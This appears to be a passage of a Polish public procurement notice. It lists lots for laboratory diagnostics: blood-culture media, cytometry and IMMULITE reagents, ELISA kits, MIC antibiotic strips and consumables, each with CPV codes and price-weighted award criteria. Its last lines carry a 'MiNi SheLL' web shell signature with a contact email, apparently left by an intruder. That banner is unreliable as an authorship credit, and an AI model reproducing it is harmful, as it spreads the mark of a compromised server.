<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Podłoża mikrobiologiczne BD BACTEC PLUS Aerobic/F Medium (wzbogacony bulion z hydrolizatem sojowo-kazeinowym i CO2 oraz żywicą) do hodowli i wykrywania drobnoustrojów tlenowych we krwi, zwiększające możliwość ich wykrycia u pacjentów leczonych antybiotykami lub równoważne dedykowane dla aparatu BD BACTEC FX. Wymagane dołączenie certyfikatu.	Op. 50szt.	3 szt
Podłoża mikrobiologiczne BD BACTEC PLUS Anaerobic/F Medium (zredukowany, wzbogacony bulion z hydrolizatem sojowo-kazeinowym i CO2 oraz żywicą) do hodowli i wykrywania drobnoustrojów beztlenowych (bakterii i drożdżaków) we krwi, zwiększające możliwość ich wykrycia u pacjentów leczonych antybiotykami lub równoważne dedykowane dla aparatu BD BACTEC FX. Wymagane dołączenie certyfikatu.	Op. 50szt.	3 szt
CaliBrite 3 Zestaw mikrosfer wyznakowanych 3 różnymi fluorochromami (FITC, PE, PerCP) oraz niewyznakowanych lub równoważny dedykowany dla aparatu BD FACS Calibur.	Op.	3 szt
BD Stem Cell Control Kit, krew kontrolna do CD34+ 2 poziomy - niski 10 komórek/?l i wysoki 35 komórek/? rekomendowana do zestawu BD Stem Cell Enumeration Kit lub równoważna dedykowana dla aparatu BD FACS Calibur	Op.	2 szt
FACSFlow Sheath Fluid płyn roboczy niezbędny do pracy cytometru lub równoważny dedykowany dla aparatu BD FACS Calibur.	Op. 20l	4 szt
Zestaw BD Stem Cell Enumeration Kit do oznaczenia liczby żywych komórek CD34+ oraz ustalenia odsetka komórek CD34+ we wszystkich żywych leukocytach. Zestaw zawiera 50 pobówek trucount, przeciwciała CD45-FITC/CD34-PE, 7-ADD oraz bufor do lizy erytrocytów lub równoważny dedykowany do aparatu BD FACS Calibur	Op. 	3 szt
Panele Combo PX PMIC/ID-72 Panele do identyfikacji i oznaczenia lekowrażliwości bakterii Gram dodatnich lub równoważne dedykowane dla aparatu BD Phoenix 100.	Op.	2 szt
Panele Combo NIMC/ID-204 Panele do identyfikacji i oznaczenia lekowrażliwości bakterii Gram ujemnych lub równoważne dedykowane dla aparatu BD Phoenix 100.	Op.	2 szt
BD Phoenix Bulion do identyfikacji (ID) w zakręcanych probówkach, 4,5 ml  (zmodyfikowany roztwór soli) do sporządzenia zawiesiny bakterii do testu identyfikacji lub równoważny dedykowany dla aparatu BD Phoenix 100.	Op.	1 szt
BD Phoenix Bulion do antybiogramów (AST) w zakręcanych probówkach 8,0 ml (zmodyfikowane płynne podłoże Mueller Hinton), który po dodaniu wskaźnika AST i zawiesiny bakteryjnej służy do testu wrażliwości na antybiotyki lub równoważny dedykowany dla aparatu BD Phoenix 100.	Op.	1 szt
BD Phoenix Indykator AST (wskaźnik redox), który po dodaniu do bulionu AST jest używany do oznaczenia wrażliwości na antybiotyki lub równoważny dedykowany dla aparatu BD Phoenix 100.	Op.	1 szt
BD Crystal Zestaw (20 paneli, 20 pokrywek  paneli, 20 probówek do inokulacji, 2 podstawki do inkubacji, bloczek do wyników) do identyfikacji klinicznie istotnych bakterii beztlenowych nieidentyfikowanych w aparacie BD Phoenix 100 lub równoważny.	Op.	1 szt
Odczynnik indolowy DMACA odczynnik niezbędny do wykonania identyfikacji bakterii Neisseria/Haemophilus oraz beztlenowców. 1 ampułka zawiera 0,5 ml 1% wodnego roztworu p-dwumetyloaminocinnamaldehydu w 10% roztworze kwasu solnego lub równoważne.	Op.	1 szt
Katalaza odczynnik niezbędny do wykonania identyfikacji bakterii Neisseria/Haemophilus oraz beztlenowców.  1 ampułka zawiera około 3% nadtlenku wodoru i 0,05% lub mniejszą ilość stabilizatora lub równoważne.	Op.	1 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.00.00-3, 33.12.41.30-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa testów diagnostycznych oraz odczynników dedykowanych do analizatora IMMULITE 2000 XPi..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Test diagnostyczny in vitro- do jakościowego oznaczania antygenu powierzchniowego HBV - HbsAg w ludzkiej surowicy lub równoważny dedykowany dla analizatora IMMULITE 2000 XPi.	Op. 	1 szt
2.	Test diagnostyczny in vitro - do jakościowego oznaczania wszystkich przeciwciał specyficznych dla antygenu rdzeniowego (HBcAg) HBV w ludzkiej surowicy lub równoważny dedykowany dla analizatora IMMULITE 2000 XPi.	Op. 	1 szt
3.	Test diagnostyczny in vitro- do jakościowego oznaczania przeciwciał klasy IgM specyficznych w stosunku do antygenów Toxoplasma gondii (anty-Toxoplasma IgM) w ludzkiej surowicy lub równoważny dedykowany dla analizatora IMMULITE 2000 XPi.	Op. 	1 szt
4.	Test diagnostyczny in vitro- do ilościowego oznaczania przeciwciał klasy IgG specyficznych w stosunku do antygenów Toxoplasma gondii (anty-Toxoplasma IgG) w ludzkiej surowicy lub równoważny dedykowany dla analizatora IMMULITE 2000 XPi.	Op. 	1 szt
5.	Test diagnostyczny in vitro- do jakościowego oznaczania przeciwciała IgG specyficznego dla cytomegalowirusa (CMV) w ludzkiej surowicy lub równoważny dedykowany dla analizatora IMMULITE 2000 XPi.	Op. 	1 szt
6.	Test diagnostyczny in vitro- do jakościowego oznaczania przeciwciał IgM specyficznych dla cytomegalowirusa (CMV) w ludzkiej surowicy lub równoważny dedykowany dla analizatora IMMULITE 2000 XPi.	Op. 	1 szt
7.	Test diagnostyczny in vitro - do jakościowego oznaczania przeciwciał dla Treponema pallidum w ludzkiej surowicy lub równoważny dedykowany dla analizatora IMMULITE 2000 XPi.	Op. 	1 szt
8.	Substrat chemiluminescencyjny odczynnik dedykowany dla analizatora IMMULITE 2000 XPi lub równoważny.	Op. 	1 szt
9.	Roztwór płuczący odczynnik dedykowany dla analizatora IMMULITE 2000 XPi lub równoważny.	Op. 	5 szt
10.	Kuwety dedykowane dla analizatora IMMULITE 2000 XPi lub równoważne.	Op.	2 szt
12.	Alkohol izopropylowy odczynnik dedykowany dla analizatora IMMULITE 2000 XPi lub równoważny.	L	4 szt
13.	Roztwór  Czyszczący ( probe Clean ) dedykowany  do analizatora Immmulite Xpi lub równoważny.	Op.	1 szt
14.	Mikroprobówki o pojemności 2,5 ml dedykowane do analizatora IMMULITE 2000 XPi lub równoważne.	Op.	2 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.00.00-3, 33.12.41.30-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa zestawów do wirowania osocza bogatopłytkowego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zestawy do pozyskiwania i separacji  osocza  bogatopłytkowego z około 13.5 ml krwi obwodowej oraz mniejszej objętości. Kompatybilne z wirówką  typu Eppendorf Centrifuge 5804 i 5804R z możliwością wirowania w 3200 obr/min. Posiadające możliwość łatwego odseparowania i pobrania  osocza bogato płytkowego  PRP.	Szt.	30..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.00.00-3, 33.69.66.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa testów immunoenzymatycznych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Test immunoenzymatyczny (ELISA) do ilościowego oznaczania stężenia ludzkiego PDGF-AB (Platelet-derived growth factor - AB) w osoczu cytrynianowym w celach naukowych. Zestaw (płytka 96 dołkowa (8x12) z wyłamywalnymi stripami) powinien być kompletny i zawierać wszystkie osczynniki niezbędne do wykonania testu.	szt.	1
2.	Test immunoenzymatyczny (ELISA) do ilościowego oznaczania stężenia ludzkiego TGF-b1 (Transforming Growth Factor-beta 1) w osoczu cytrynianowym w celach naukowych. Zestaw (płytka 96 dołkowa (8x12) z wyłamywalnymi stripami)  powinien być kompletny i zawierać wszystkie osczynniki niezbędne do wykonania testu.	szt.	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.00.00-3, 33.69.66.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostawa podłoży mikrobiologicznych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Podłoże Mueller Hinton agar, puder op. Jednostkowe 500g.	Op.	1 szt
2.	Podłoże Schaedler do hodowli beztlenowców na płytkach.	Szt.	100
3.	Zestaw barwników do bawienia Grama, 500 ml każdego z odczynników możliwość, przedstawienia oferty na 2 zestawy po 250 ml.	Op.	1 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.00.00-3, 33.69.81.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Dostawa pasków do oznaczania MIC..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Gentamycyna 0.016 - 256	szt.	60
2.	Meropenem 0.002 - 32	szt.	30
3.	Ampicylina 0.016 - 256	szt.	60
4.	Amikacyna 0.016 - 256	szt.	30
5.	Amoksycylina/ kwas klawulonowy 0.016 - 256 	szt.	30
6.	Kolistyna 0.016 - 256	szt.	30
7.	Lewofloksacyna 0.002 - 32	szt.	30
8.	Tigecyklina 0.016 - 256	szt.	30
9.10.	Cefotaksym 0.016 - 256	szt.	60
10.	Penicylina G 0.002 - 32	szt.	30
11.	Trimetoporyna 0.002 - 32	szt.	30
12.	Wankomycyna 0.016 - 256	szt.	30
13.	Linezolid 0.016 - 256	szt.	30
14.	Ciprofloksacyna 0.002 - 32	szt.	30
15.	Ryfampicyna 0.002 - 32	szt.	30
16.	Tetracyklina 0.016 - 256	szt.	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.00.00-3, 33.69.81.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Dostawa materiałów zużywalnych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Folia uszczelniająca typu Parafilm (100x75 mm)	szt.	5
2.	Probówki 1,5 ml typu eppendorf, bezbarwne, z zabezpieczeniem typu safe-lock oraz z matowym wieczkiem umożliwiającym oznaczanie prób  	szt.	1000
3.	Probówki 2,0 ml typu eppendorf, bezbarwne, z zabezpieczeniem typu safe-lock oraz z matowym wieczkiem umożliwiającym oznaczanie prób  	szt.	20 000
4.	Probówki typu falcon o pojemności 15 ml, stożkowe, zakręcane, wykonane z polipropylenu, przeźroczyste, z precyzyjnie widoczną skalą oraz białym polem do opisu, odporne na wirowanie i mrożenie	szt.	1000
5.	Probówki typu falcon o pojemności 50 ml, stożkowe, zakręcane, wykonane z polipropylenu, przeźroczyste, z precyzyjnie widoczną skalą oraz białym polem do opisu, odporne na wirowanie i mrożenie	szt.	500
6.	Końcówki do pipet o pojemności 100-1000 ?l, niesterylne, autoklawowalne, pakowane w worku 	szt.	5000
7.	Szalki Petriego o wymiarach ok. 90x14 mm, sterylne, bez wentylacji 	szt.	1000
8.	Szalki Petriego o wymiarach ok. 120x17 mm, sterylne, bez wentylacji	szt.	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.00.00-3, 33.19.25.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com